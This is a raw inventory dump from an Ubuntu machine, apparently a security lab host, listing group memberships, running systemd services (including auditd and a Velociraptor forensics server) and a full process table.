adm:x:4:syslog,champuser
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:champuser
floppy:x:25:
tape:x:26:
sudo:x:27:champuser,sudoadmin
audio:x:29:pulse
dip:x:30:champuser
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:champuser
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
crontab:x:104:
messagebus:x:105:
systemd-timesync:x:106:
input:x:107:
sgx:x:108:
kvm:x:109:
render:x:110:
syslog:x:111:
_ssh:x:112:
tss:x:113:
bluetooth:x:114:
ssl-cert:x:115:
uuidd:x:116:
systemd-oom:x:117:
tcpdump:x:118:
avahi-autoipd:x:119:
netdev:x:120:
avahi:x:121:
lpadmin:x:122:champuser
rtkit:x:123:
whoopsie:x:124:
sssd:x:125:
fwupd-refresh:x:126:
nm-openvpn:x:127:
scanner:x:128:saned
saned:x:129:
colord:x:130:
geoclue:x:131:
pulse:x:132:
pulse-access:x:133:
gdm:x:134:
lxd:x:135:champuser
champuser:x:1000:
sambashare:x:136:champuser
sudoadmin:x:1001:
--------------------------------- services
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
apparmor.service loaded active exited Load AppArmor profiles
apport.service loaded active exited LSB: automatic crash report generation
auditd.service loaded active running Security Auditing Service
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
colord.service loaded active running Manage, Install and Generate Color Profiles
console-setup.service loaded active exited Set console font and keymap
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
cups.service loaded active running CUPS Scheduler
dbus.service loaded active running D-Bus System Message Bus
gdm.service loaded active running GNOME Display Manager
irqbalance.service loaded active running irqbalance daemon
kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures
keyboard-setup.service loaded active exited Set the console keyboard layout
kmod-static-nodes.service loaded active exited Create List of Static Device Nodes
ModemManager.service loaded active running Modem Manager
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
NetworkManager-wait-online.service loaded active exited Network Manager Wait Online
NetworkManager.service loaded active running Network Manager
openvpn.service loaded active exited OpenVPN service
packagekit.service loaded active running PackageKit Daemon
plymouth-quit-wait.service loaded active exited Hold until boot process finishes up
plymouth-read-write.service loaded active exited Tell Plymouth To Write Out Runtime Data
plymouth-start.service loaded active exited Show Plymouth Boot Screen
podman-restart.service loaded active exited Podman Start All Containers With Restart Policy Set To Always
polkit.service loaded active running Authorization Manager
power-profiles-daemon.service loaded active running Power Profiles daemon
rsyslog.service loaded active running System Logging Service
rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service
setvtrgb.service loaded active exited Set console scheme
snapd.apparmor.service loaded active exited Load AppArmor profiles managed internally by snapd
snapd.seeded.service loaded active exited Wait until snapd is fully seeded
snapd.service loaded active running Snap Daemon
switcheroo-control.service loaded active running Switcheroo Control Proxy service
systemd-binfmt.service loaded active exited Set Up Additional Binary Formats
systemd-fsck@dev-disk-by\x2duuid-4015\x2d7165.service loaded active exited File System Check on /dev/disk/by-uuid/4015-7165
systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running User Login Management
systemd-modules-load.service loaded active exited Load Kernel Modules
systemd-oomd.service loaded active running Userspace Out-Of-Memory (OOM) Killer
systemd-random-seed.service loaded active exited Load/Save Random Seed
systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems
systemd-resolved.service loaded active running Network Name Resolution
systemd-sysctl.service loaded active exited Apply Kernel Variables
systemd-sysusers.service loaded active exited Create System Users
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev
systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories
systemd-udev-trigger.service loaded active exited Coldplug All udev Devices
systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files
systemd-update-utmp.service loaded active exited Record System Boot/Shutdown in UTMP
systemd-user-sessions.service loaded active exited Permit User Sessions
udisks2.service loaded active running Disk Manager
ufw.service loaded active exited Uncomplicated firewall
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user-runtime-dir@1000.service loaded active exited User Runtime Directory /run/user/1000
user@1000.service loaded active running User Manager for UID 1000
velociraptor.service loaded active running Velociraprot linux amd64
wpa_supplicant.service loaded active running WPA supplicant
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
63 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
--------------------------------- List Processes
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 168036 12752 ? Ss 11:08 0:08 /sbin/init splash
root 2 0.0 0.0 0 0 ? S 11:08 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 11:08 0:00 [pool_workqueue_release]
root 4 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_g]
root 5 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-rcu_p]
root 6 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-slub_]
root 7 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-netns]
root 10 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/0:0H-events_highpri]
root 12 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mm_pe]
root 13 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_kthread]
root 14 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_rude_kthread]
root 15 0.0 0.0 0 0 ? I 11:08 0:00 [rcu_tasks_trace_kthread]
root 16 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/0]
root 17 0.0 0.0 0 0 ? I 11:08 0:04 [rcu_preempt]
root 18 0.0 0.0 0 0 ? S 11:08 0:00 [migration/0]
root 19 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/0]
root 20 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/0]
root 21 0.0 0.0 0 0 ? S 11:08 0:00 [cpuhp/1]
root 22 0.0 0.0 0 0 ? S 11:08 0:00 [idle_inject/1]
root 23 0.0 0.0 0 0 ? S 11:08 0:00 [migration/1]
root 24 0.0 0.0 0 0 ? S 11:08 0:00 [ksoftirqd/1]
root 26 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/1:0H-events_highpri]
root 29 0.0 0.0 0 0 ? S 11:08 0:00 [kdevtmpfs]
root 30 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-inet_]
root 31 0.6 0.0 0 0 ? S 11:08 3:21 [kauditd]
root 32 0.0 0.0 0 0 ? S 11:08 0:00 [khungtaskd]
root 33 0.0 0.0 0 0 ? S 11:08 0:00 [oom_reaper]
root 35 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-write]
root 36 0.0 0.0 0 0 ? S 11:08 0:06 [kcompactd0]
root 38 0.0 0.0 0 0 ? SN 11:08 0:00 [ksmd]
root 39 0.0 0.0 0 0 ? SN 11:08 0:00 [khugepaged]
root 40 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kinte]
root 41 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kbloc]
root 42 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-blkcg]
root 43 0.0 0.0 0 0 ? S 11:08 0:00 [irq/9-acpi]
root 44 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-tpm_d]
root 45 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ata_s]
root 46 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md]
root 47 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-md_bi]
root 48 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-edac-]
root 49 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-devfr]
root 50 0.0 0.0 0 0 ? S 11:08 0:00 [watchdogd]
root 51 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/0:1H-kblockd]
root 52 0.0 0.0 0 0 ? S 11:08 0:06 [kswapd0]
root 53 0.0 0.0 0 0 ? S 11:08 0:00 [ecryptfs-kthread]
root 55 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kthro]
root 56 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-acpi_]
root 57 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_0]
root 58 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_]
root 59 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_1]
root 60 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_]
root 61 0.0 0.0 0 0 ? S 11:08 0:00 [scsi_eh_2]
root 62 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-scsi_]
root 66 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-mld]
root 67 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ipv6_]
root 76 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-kstrp]
root 78 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u7:0]
root 79 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u8:0]
root 80 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/u9:0]
root 94 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-charg]
root 113 0.0 0.0 0 0 ? I< 11:08 0:11 [kworker/1:1H-kblockd]
root 146 0.0 0.0 0 0 ? I 11:08 0:12 [kworker/u4:1-ext4-rsv-conversion]
root 181 0.1 0.0 0 0 ? S 11:08 0:38 [jbd2/sda3-8]
root 182 0.0 0.0 0 0 ? I< 11:08 0:00 [kworker/R-ext4-]
root 221 0.1 3.3 469244 203208 ? S<s 11:09 0:50 /lib/systemd/systemd-journald
root 253 0.0 0.1 26888 6608 ? Ss 11:09 0:00 /lib/systemd/systemd-udevd
root 306 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-ttm]
root 308 0.0 0.0 0 0 ? I< 11:09 0:00 [kworker/R-crypt]
systemd+ 378 0.1 0.1 14836 6272 ? Ss 11:09 0:49 /lib/systemd/systemd-oomd
systemd+ 381 0.0 0.1 26464 10096 ? Ss 11:09 0:01 /lib/systemd/systemd-resolved
systemd+ 385 0.0 0.1 89388 6144 ? Ssl 11:09 0:00 /lib/systemd/systemd-timesyncd
root 391 2.3 0.0 11872 2692 ? S<sl 11:09 12:34 /sbin/auditd
root 424 0.0 0.0 0 0 ? S 11:09 0:00 [audit_prune_tree]
root 487 0.0 0.1 240040 6968 ? Ssl 11:09 0:01 /usr/libexec/accounts-daemon
root 488 0.0 0.0 2816 1920 ? Ss 11:09 0:00 /usr/sbin/acpid
avahi 491 0.0 0.0 7632 3712 ? Ss 11:09 0:01 avahi-daemon: running [ubuntu-28.local]
root 493 0.0 0.0 9496 2688 ? Ss 11:09 0:00 /usr/sbin/cron -f -P
message+ 494 0.0 0.1 11120 6656 ? Ss 11:09 0:02 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 496 0.0 0.2 261108 14912 ? Ssl 11:09 0:04 /usr/sbin/NetworkManager --no-daemon
root 502 0.0 0.0 82768 3328 ? Ssl 11:09 0:01 /usr/sbin/irqbalance --foreground
root 506 0.0 0.2 41200 13824 ? Ss 11:09 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 508 0.0 0.1 243096 10256 ? Ssl 11:09 0:02 /usr/libexec/polkitd --no-debug
root 509 0.0 0.0 240068 5888 ? Ssl 11:09 0:00 /usr/libexec/power-profiles-daemon
syslog 511 0.0 0.0 222404 4480 ? Ssl 11:09 0:00 /usr/sbin/rsyslogd -n -iNONE
root 515 0.0 0.3 1849620 23012 ? Ssl 11:09 0:06 /usr/lib/snapd/snapd
root 517 0.0 0.0 236380 5760 ? Ssl 11:09 0:00 /usr/libexec/switcheroo-control
root 522 0.0 0.1 15400 6648 ? Ss 11:09 0:00 /lib/systemd/systemd-logind
root 525 0.0 0.1 393080 10072 ? Ssl 11:09 0:00 /usr/libexec/udisks2/udisksd
root 528 0.0 0.0 16504 4352 ? Ss 11:09 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
avahi 551 0.0 0.0 7444 1408 ? S 11:09 0:00 avahi-daemon: chroot helper
root 580 0.0 0.1 317972 7736 ? Ssl 11:09 0:00 /usr/sbin/ModemManager
root 593 0.0 0.4 6166548 27960 ? Ssl 11:09 0:13 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v
root 614 0.0 0.2 118192 15872 ? Ssl 11:09 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 641 0.0 0.1 241344 7808 ? Ssl 11:09 0:00 /usr/sbin/gdm3
root 645 0.0 0.1 73028 10752 ? Ss 11:09 0:00 /usr/sbin/cupsd -l
root 691 0.0 0.1 172068 9856 ? Ssl 11:09 0:00 /usr/sbin/cups-browsed
kernoops 707 0.0 0.0 13092 2456 ? Ss 11:09 0:00 /usr/sbin/kerneloops --test
kernoops 712 0.0 0.0 13092 2324 ? Ss 11:09 0:00 /usr/sbin/kerneloops
root 721 0.2 0.8 6168788 53052 ? Sl 11:09 1:25 /usr/local/bin/velociraptor --config /root/server.config.yaml frontend -v
rtkit 745 0.0 0.0 154004 3328 ? SNsl 11:09 0:00 /usr/libexec/rtkit-daemon
root 968 0.0 0.1 242228 7296 ? Ssl 11:09 0:00 /usr/libexec/upowerd
root 974 0.0 0.2 298380 15420 ? Ssl 11:09 0:00 /usr/libexec/packagekitd
colord 1109 0.0 0.1 245376 10104 ? Ssl 11:09 0:00 /usr/libexec/colord
root 1169 0.0 0.1 391920 10548 ? Sl 11:09 0:00 gdm-session-worker [pam/gdm-password]
champus+ 1173 0.0 0.1 17984 10240 ? Ss 11:09 0:02 /lib/systemd/systemd --user
champus+ 1174 0.0 0.0 169964 4316 ? S 11:09 0:00 (sd-pam)
champus+ 1180 0.0 0.0 39568 4480 ? S<sl 11:09 0:00 /usr/bin/pipewire
champus+ 1181 0.0 0.0 23456 4480 ? Ssl 11:09 0:00 /usr/bin/pipewire-media-session
champus+ 1182 0.0 0.2 2132512 16868 ? S<sl 11:09 0:00 /usr/bin/pulseaudio --daemonize=no --log-target=journal
champus+ 1193 0.0 0.1 240892 6428 ? Sl 11:09 0:00 /usr/bin/gnome-keyring-daemon --daemonize --login
champus+ 1201 0.0 0.0 162432 5504 tty2 Ssl+ 11:09 0:00 /usr/libexec/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --session=ubuntu
champus+ 1203 0.2 1.5 656076 94788 tty2 Sl+ 11:09 1:22 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -nolisten tcp -background none -noreset -keeptty -novtswitch -verbose 3
champus+ 1214 0.0 0.1 10320 6528 ? Ss 11:09 0:02 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
champus+ 1215 0.0 0.1 612836 6784 ? Ssl 11:09 0:00 /usr/libexec/xdg-document-portal
champus+ 1218 0.0 0.0 236156 5504 ? Ssl 11:09 0:00 /usr/libexec/xdg-permission-store
root 1224 0.0 0.0 2796 1792 ? Ss 11:09 0:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc
champus+ 1252 0.0 0.2 223044 12544 tty2 Sl+ 11:09 0:00 /usr/libexec/gnome-session-binary --session=ubuntu
champus+ 1341 0.0 0.1 309728 7296 ? Ssl 11:09 0:00 /usr/libexec/at-spi-bus-launcher
champus+ 1347 0.0 0.0 8564 4352 ? S 11:09 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 11 --address=unix:path=/run/user/1000/at-spi/bus_1
champus+ 1390 0.0 0.0 91912 4736 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-ctl --monitor
champus+ 1406 0.0 0.1 240648 6656 ? Ssl 11:09 0:00 /usr/libexec/gvfsd
champus+ 1418 0.0 0.0 380896 5888 ? Sl 11:09 0:00 /usr/libexec/gvfsd-fuse /run/user/1000/gvfs -f
champus+ 1423 0.0 0.2 519128 12672 ? Ssl 11:09 0:00 /usr/libexec/gnome-session-binary --systemd-service --session=ubuntu
champus+ 1468 1.4 4.7 4242500 286388 ? Ssl 11:09 7:35 /usr/bin/gnome-shell
champus+ 1516 0.0 0.2 583040 17024 ? Sl 11:09 0:00 /usr/libexec/gnome-shell-calendar-server
champus+ 1522 0.0 0.3 1072140 21504 ? Ssl 11:09 0:00 /usr/libexec/evolution-source-registry
champus+ 1530 0.0 0.4 597216 27264 ? Sl 11:09 0:00 /usr/libexec/goa-daemon
champus+ 1533 0.0 0.4 840468 24960 ? Ssl 11:09 0:00 /usr/libexec/evolution-calendar-factory
champus+ 1542 0.0 0.1 338404 11136 ? Sl 11:09 0:00 /usr/libexec/goa-identity-service
champus+ 1543 0.0 0.1 315892 9216 ? Ssl 11:09 0:00 /usr/libexec/gvfs-udisks2-volume-monitor
champus+ 1553 0.0 0.1 315212 6784 ? Ssl 11:09 0:02 /usr/libexec/gvfs-afc-volume-monitor
champus+ 1561 0.0 0.0 236460 5760 ? Ssl 11:09 0:00 /usr/libexec/gvfs-mtp-volume-monitor
champus+ 1563 0.0 0.0 156940 5376 ? Ssl 11:09 0:00 /usr/libexec/dconf-service
champus+ 1572 0.0 0.3 672364 23680 ? Ssl 11:09 0:00 /usr/libexec/evolution-addressbook-factory
champus+ 1573 0.0 0.0 236636 6016 ? Ssl 11:09 0:00 /usr/libexec/gvfs-goa-volume-monitor
champus+ 1577 0.0 0.1 237416 6144 ? Ssl 11:09 0:00 /usr/libexec/gvfs-gphoto2-volume-monitor
champus+ 1594 0.0 0.1 314868 7680 ? Sl 11:09 0:00 /usr/libexec/gvfsd-trash --spawner :1.19 /org/gtk/gvfs/exec_spaw/0
champus+ 1603 0.0 0.3 2599500 21508 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.Shell.Notifications
champus+ 1606 0.0 0.1 162756 7040 ? Sl 11:09 0:00 /usr/libexec/at-spi2-registryd --use-gnome-session
champus+ 1618 0.0 0.0 2892 1664 ? Ss 11:09 0:00 sh -c /usr/bin/ibus-daemon --panel disable $([ "$XDG_SESSION_TYPE" = "x11" ] && echo "--xim")
champus+ 1619 0.0 0.0 310392 5760 ? Ssl 11:09 0:00 /usr/libexec/gsd-a11y-settings
champus+ 1622 0.0 0.1 315500 8484 ? Sl 11:09 0:19 /usr/bin/ibus-daemon --panel disable --xim
champus+ 1624 0.0 0.3 537204 19428 ? Ssl 11:09 0:00 /usr/libexec/gsd-color
champus+ 1630 0.0 0.1 375436 11520 ? Ssl 11:09 0:00 /usr/libexec/gsd-datetime
champus+ 1633 0.0 0.1 312080 7040 ? Ssl 11:09 0:01 /usr/libexec/gsd-housekeeping
champus+ 1634 0.0 0.2 341424 16108 ? Ssl 11:09 0:00 /usr/libexec/gsd-keyboard
champus+ 1638 0.0 0.3 717624 19908 ? Ssl 11:09 0:00 /usr/libexec/gsd-media-keys
champus+ 1640 0.0 0.3 525040 19320 ? Ssl 11:09 0:00 /usr/libexec/gsd-power
champus+ 1642 0.0 0.1 249872 9344 ? Ssl 11:09 0:00 /usr/libexec/gsd-print-notifications
champus+ 1643 0.0 0.1 232272 6784 ? Sl 11:09 0:00 /usr/libexec/gsd-disk-utility-notify
champus+ 1644 0.0 0.0 457856 5888 ? Ssl 11:09 0:00 /usr/libexec/gsd-rfkill
champus+ 1646 0.0 0.0 236292 5504 ? Ssl 11:09 0:00 /usr/libexec/gsd-screensaver-proxy
champus+ 1649 0.0 0.1 465780 8192 ? Ssl 11:09 0:00 /usr/libexec/gsd-sharing
champus+ 1654 0.0 0.1 312272 6656 ? Ssl 11:09 0:00 /usr/libexec/gsd-smartcard
champus+ 1657 0.0 0.8 762828 52624 ? Sl 11:09 0:00 /usr/libexec/evolution-data-server/evolution-alarm-notify
champus+ 1661 0.0 0.1 319312 7808 ? Ssl 11:09 0:00 /usr/libexec/gsd-sound
champus+ 1665 0.0 0.2 268020 15892 ? Ssl 11:09 0:00 /usr/libexec/gsd-wacom
champus+ 1674 0.0 0.2 343292 18172 ? Ssl 11:09 0:00 /usr/libexec/gsd-xsettings
champus+ 1693 0.0 0.1 237312 6272 ? Sl 11:09 0:00 /usr/libexec/ibus-dconf
champus+ 1695 0.0 0.3 272488 21236 ? Sl 11:09 0:04 /usr/libexec/ibus-extension-gtk3
champus+ 1701 0.0 0.3 194160 20792 ? Sl 11:09 0:00 /usr/libexec/ibus-x11 --kill-daemon
champus+ 1706 0.0 0.1 237264 6400 ? Sl 11:09 0:00 /usr/libexec/ibus-portal
champus+ 1723 0.0 0.2 342364 13184 ? Sl 11:09 0:00 /usr/libexec/gsd-printer
champus+ 1733 0.0 0.0 39136 4224 ? Ss 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
champus+ 1745 0.0 0.1 623772 10496 ? Ssl 11:09 0:01 /usr/libexec/xdg-desktop-portal
champus+ 1765 0.0 0.8 1395884 54488 ? Ssl 11:09 0:02 /usr/libexec/xdg-desktop-portal-gnome
champus+ 1851 0.0 0.4 2534008 25116 ? Sl 11:09 0:00 /usr/bin/gjs /usr/share/gnome-shell/org.gnome.ScreenSaver
champus+ 1855 0.0 1.1 915040 68504 ? Sl 11:09 0:00 /snap/snapd-desktop-integration/315/usr/bin/snapd-desktop-integration
champus+ 1874 0.0 0.1 163612 6784 ? Sl 11:09 0:06 /usr/libexec/ibus-engine-simple
champus+ 1875 0.0 0.4 719576 30220 ? SNsl 11:09 0:02 /usr/libexec/tracker-miner-fs-3
champus+ 1926 0.0 0.2 342028 17920 ? Ssl 11:09 0:00 /usr/libexec/xdg-desktop-portal-gtk
champus+ 1962 0.0 0.0 163048 5760 ? Ssl 11:09 0:00 /usr/libexec/gvfsd-metadata
champus+ 1997 0.0 0.5 537936 33792 ? Sl 11:10 0:02 update-notifier
champus+ 3887 0.0 0.0 41316 2688 ? S 11:16 0:00 podman
champus+ 9538 0.0 1.0 1203740 62444 ? Sl 11:40 0:05 /usr/bin/nautilus --gapplication-service
champus+ 9568 3.6 11.7 12402388 715020 ? Sl 11:42 18:06 /snap/firefox/7177/usr/lib/firefox/firefox
champus+ 9638 0.0 0.0 21072 1696 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/crashhelper 9568 9 /tmp/ 11
champus+ 9701 0.0 0.4 299784 24576 ? S 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -ipcHandle 0 -signalPipe 1 -initialChannelId {54ef713b-a611-4e84-9f06-df63f5debaf4} -parentPid 9568 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 1 forkserver
champus+ 9704 0.0 0.5 314180 36012 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:35969 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {232c0fd9-eff3-428d-9663-2763ef6a6ffb} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 2 socket
champus+ 9732 1.7 3.0 2547960 183704 ? Sl 11:42 8:36 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:36141 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {2f719dbf-acd1-40e7-9c1f-45b26d269367} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 3 tab
champus+ 9743 0.0 0.6 447228 39212 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -prefsHandle 0:36141 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {83a6878e-195a-47e0-aa3f-fe4a5dfe3b7b} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 4 rdd
champus+ 9780 0.0 0.2 1765940 17792 ? Sl 11:42 0:01 /usr/bin/snap userd
champus+ 9938 0.0 1.3 2465008 81980 ? Sl 11:42 0:01 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:45757 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0e618765-94ab-4adb-96ee-e57c09db7d36} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 5 tab
champus+ 10235 0.0 0.7 451848 44592 ? Sl 11:42 0:00 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -parentBuildID 20251028100515 -sandboxingKind 0 -prefsHandle 0:46927 -prefMapHandle 1:275119 -sandboxReporter 2 -chrootClient 3 -ipcHandle 4 -initialChannelId {4c7ee706-7853-4c03-b832-7098687275bf} -parentPid 9568 -crashReporter 5 -crashHelper 6 -appDir /snap/firefox/7177/usr/lib/firefox/browser 6 utility
champus+ 10244 1.2 9.9 3222128 603536 ? Sl 11:42 6:10 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43481 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {22da36fa-b041-4214-bca0-96970a908d65} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 7 tab
champus+ 10451 0.2 1.2 2454436 77580 ? Sl 11:42 1:08 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43670 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {0846778f-6aeb-4339-8fc9-4ab5f998a29e} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 10 tab
champus+ 10653 0.0 0.1 388688 7808 ? Sl 11:43 0:00 /usr/libexec/gvfsd-network --spawner :1.19 /org/gtk/gvfs/exec_spaw/1
champus+ 10667 0.0 0.1 316828 7808 ? Sl 11:43 0:00 /usr/libexec/gvfsd-dnssd --spawner :1.19 /org/gtk/gvfs/exec_spaw/3
champus+ 10741 0.0 1.0 2428568 65204 ? Sl 11:47 0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {7824f062-f181-48fd-85a5-9646d4287f73} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 14 tab
champus+ 10748 0.0 1.0 2428568 65296 ? Sl 11:47 0:27 /snap/firefox/7177/usr/lib/firefox/firefox -contentproc -isForBrowser -prefsHandle 0:43779 -prefMapHandle 1:275119 -jsInitHandle 2:224660 -parentBuildID 20251028100515 -sandboxReporter 3 -chrootClient 4 -ipcHandle 5 -initialChannelId {31607e45-8b35-41da-9de7-799bfb0700ea} -parentPid 9568 -crashReporter 6 -crashHelper 7 -greomni /snap/firefox/7177/usr/lib/firefox/omni.ja -appomni /snap/firefox/7177/usr/lib/firefox/browser/omni.ja -appDir /snap/firefox/7177/usr/lib/firefox/browser 15 tab
